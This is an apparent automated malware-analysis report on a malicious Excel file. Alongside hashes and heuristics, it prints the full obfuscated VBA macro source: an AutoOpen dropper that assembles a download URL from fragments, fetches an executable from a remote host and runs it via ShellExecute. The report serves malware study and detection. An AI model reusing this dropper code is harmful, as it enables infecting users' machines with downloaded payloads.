Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b1b9fe0a5aef655…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 84.5 KB
Created: 2016-12-13 14:47:12
Authoring application: Microsoft Excel
First seen: 2017-03-05
MD5: af2ed617e2567ef55c6530708ab6813d
SHA-1: 17d3ab0fca8a90d7e3cc933a36ee77e038e2598f
SHA-256: 7b1b9fe0a5aef655cf3b397ecc291ca97a39c6675431512cacd944eeac4ca2a0
Risk Score: 278

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1105 Ingress Tool Transfer

The sample is a malicious Excel file containing VBA macros. It uses the URLDownloadToFile API to download a second-stage payload from a URL, which is then likely executed. The presence of an AutoOpen macro, together with the lure asking the user to enable macros, indicates a deliberate attempt to trick the user into running the malicious code.

Heuristics (9)

  • ClamAV: Xls.Malware.Agent-5772348-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Agent-5772348-0
  • Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
  • VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
    Matched lines in script:
    Private Declare PtrSafe Function bysgomq Lib "kernel32" (ByVal kikcogl As Variant, ByVal uskuhqi As Single, ByVal yqxig As Long, ByVal xodzidfe As Single, ByVal vnaves As String, ByVal iweb As Variant, ByVal zachevco As Byte, ByVal lxevig As Object) As Byte
    Private Declare PtrSafe Function wqyfgowy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal irfusy As Long, ByVal pimiqje As String, ByVal ajujx As String, ByVal xirse As Long, ByVal saxqyhh As Long) As Long
    Private Declare PtrSafe Function ykawg Lib "netapi32" (ByVal wkyqek As String, ByVal vixela As Currency, ByVal almijcubd As Integer, ByVal udezr As Double, ByVal jdijitze As Single, ByVal ejip As Object) As Boolean
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
    Sub AutoOpen()
    kifmu = "open"
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Matched lines in script:
    Case 14
    ygeko = Environ(opebahu0()) & apapynz()
    yvazju = wqyfgowy(hake, hqikbak(), ygeko, hake, hake)
  • Reference to ShellExecute API (high, SC_STR_SHELLEXEC)
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (each referenced by macro):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/photoshop/1.0/
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.adobe.com/exif/1.0/

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8005 bytes
SHA-256: 6d815d1338a0097c792daf72eba4becbe00464660fe8da89aef9f509dbe14d80

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare PtrSafe Function vyxy Lib "gdi32" (ByVal avunq As Currency, ByVal hinhuq As Currency, ByVal qgupxozv As Variant, ByVal hydhyxo As Single, ByVal relyfka As Single, ByVal attibk As Byte) As Byte
Private Declare PtrSafe Function bysgomq Lib "kernel32" (ByVal kikcogl As Variant, ByVal uskuhqi As Single, ByVal yqxig As Long, ByVal xodzidfe As Single, ByVal vnaves As String, ByVal iweb As Variant, ByVal zachevco As Byte, ByVal lxevig As Object) As Byte
Private Declare PtrSafe Function wqyfgowy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal irfusy As Long, ByVal pimiqje As String, ByVal ajujx As String, ByVal xirse As Long, ByVal saxqyhh As Long) As Long
Private Declare PtrSafe Function ykawg Lib "netapi32" (ByVal wkyqek As String, ByVal vixela As Currency, ByVal almijcubd As Integer, ByVal udezr As Double, ByVal jdijitze As Single, ByVal ejip As Object) As Boolean
Private Declare PtrSafe Function bbakahde Lib "shell32.dll" Alias "ShellExecuteA" (ByVal oxwix As LongPtr, ByVal cesi As String, ByVal hidcura As String, ByVal meka As String, ByVal rotumg As String, ByVal vizmud As Long) As LongPtr
Private Declare PtrSafe Function aqsin Lib "advapi32" (ByVal fnylqa As Byte, ByVal almoju As Object, ByVal fxycduxz As String)
Private Declare PtrSafe Function ysino Lib "advapi32" Alias "sryhkinno" (ByVal pokjih As Byte, ByVal vamce As Variant, ByVal igymaf As Object, ByVal jbijizro As Byte, ByVal ercyma As Byte) As Long
Private Declare PtrSafe Function uviq Lib "gdi32" (ByVal cpelavja As Byte, ByVal uvxik As Variant, ByVal ovtuppu As Currency, ByVal osjehlel As Byte)
Private Declare PtrSafe Function uphyhp Lib "advapi32" Alias "riblowe" (ByVal eqakpo As Double, ByVal bagzet As Single, ByVal ujespew As String, ByVal sigca As String, ByVal ijodl As Currency, ByVal corynu As Variant, ByVal vzeclaw As Currency, ByVal qymup As Currency, ByVal etzyzy As Double) As Variant
Private Declare PtrSafe Function ygxuro Lib "netapi32" Alias "glevzylu" (ByVal vomax As Object, ByVal byvri As Integer, ByVal ezhetwa As Variant, ByVal jiqi As Object, ByVal eccipli As Single, ByVal wbexkij As Single, ByVal dfohtiw As Long, ByVal edyv As String) As Double
Private Declare PtrSafe Function esmemov Lib "user32" Alias "oxkokxazj" (ByVal oricylw As Variant, ByVal koni As Variant, ByVal nejhi As Byte)
Private Declare PtrSafe Function odip Lib "kernel32" (ByVal isyfbodf As Currency, ByVal duhbukv As Boolean, ByVal odsile As Currency, ByVal ikpody As Single, ByVal vefavo As Byte, ByVal btapub As Variant)
Function ibbityv()
qyjonnysijqeqorqalygemxyhn = 2406
ibbityv = "te"
End Function

Function evtukabo()
vutxyxiwdenawyqububkiqgizib = 2306
evtukabo = "mp"
End Function

Function nejomji()
ecozgobbytenvikrajzajlyvxewka = 2740
nejomji = "\ml"
End Function

Function uwzovy()
owybomjihofxyjcozokkipbewo = 2452
uwzovy = "ula"
End Function

Function ysgaca()
acqofepudupobcetbajgygbaqu = 2364
ysgaca = "vxy"
End Function

Function lsymdabaj()
humseshabizercafeginiwu = 2078
lsymdabaj = ".ex"
End Function

Function uzmavazb()
sryxcamutpodvotdyzzibcovgofqydpedw = 2786
uzmavazb = "e"
End Function

Function ycyqg()
bcuvarfobvypaweseqavepga = 2259
ycyqg = "ht"
End Function

Function gowesd()
edkerqisjawjupovermiqevcujuzfomr = 2354
gowesd = "tp"
End Function

Function lovkycl()
afyzarwomheqotanwapeqryvw = 2219
lovkycl = ":/"
End Function

Function msigullefh()
merdicezivjivsujgavgyxacted = 2653
msigullefh = "/r"
End Function

Function uvufe()
yqhuvqyvvuxidqizevzuficyjsije = 2837
uvufe = "ey"
End Function

Function obziq()
dhicipinehpyvrugkaterticvyhetpe = 2932
obziq = "tr"
End Function

Function davyb()
emahmohipojehosqalymasfe = 2784
davyb = "yd"
End Function

Function evohdilu()
sisnextumwusedcakgiqdojifdesemy = 2717
evohdilu = "r."
End Function

Function cxibok()
lotzafhyzcyxoppyccogwibwiqkypeg = 2188
cxibok = "to"
End Function

Function osijh()
icpojqilbaguhwubisucamip = 2005
osijh = "p/"
End Function

Function imanfawq()
kuwmonubaparifossypojyctulsa = 2146
imanfawq = "of"
End Function

Function eslox()
vesuhdaxepujvoxyrkojotjacukwy = 2636
eslox = "fi"
End Function

Function uveqwavde()
nejojudborikupnoravipu = 2946
uveqwavde = "cs"
End Function

Function ludnudupv()
uwjemnixxosjacupisahyruna = 2557
ludnudupv = "em"
End Function

Function ajax()
ehenwepjegsobcyflutryqbyhdibquxbit = 2039
ajax = "gm"
End Function

Function cima()
uwlycdyxxendujolinuzygudexev = 2840
cima = "te"
End Function

Function vepe()
impicilorutuzniginpibqacsit = 2734
vepe = ".e"
End Function

Function ixfywnox()
rafwybwyfjoztermujerehnikojif = 2329
ixfywnox = "xe"
End Function

Function vomexyjl()
ruwyry = "2476"
vomexyjl = ruwyry
End Function

Function vqomofif()
vqomofif = Empty
End Function

Function xridpek()
fokcetvoj = Empty
xridpek = fokcetvoj
End Function

Function opebahu0()
jsemvydwe = "vwuckuk"
opebahu0 = ibbityv() & evtukabo()
End Function

Function apapynz()
ujhexebs = "fsaffefq"
apapynz = nejomji() & uwzovy() & ysgaca() & lsymdabaj() & uzmavazb()
End Function

Function hqikbak()
inabo = "essecgevpef"
hqikbak = ycyqg() & gowesd() & lovkycl() & msigullefh() & uvufe() & obziq() & davyb() & evohdilu() & cxibok() & osijh() & imanfawq() & eslox() & uveqwavde() & ludnudupv() & ajax() & cima() & vepe() & ixfywnox()
End Function

Sub AutoOpen()
kifmu = "open"
qedivl = "utrizuna"
eqat = "aqefbe"
simme = ""
fyksi = "agtyhjy"
olpahydif = "vmagokmi"
trutuk = "23295"
hake = 0
alyj = "98647"
ywansone = 14
Select Case ywansone
Case Empty
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

Case 14
ygeko = Environ(opebahu0()) & apapynz()
yvazju = wqyfgowy(hake, hqikbak(), ygeko, hake, hake)
If yvazju = 0 Then
ehqespe = bbakahde(hake, kifmu, ygeko, simme, simme, hake)
End If

Case Null
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

Case "75143"
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

End Select

End Sub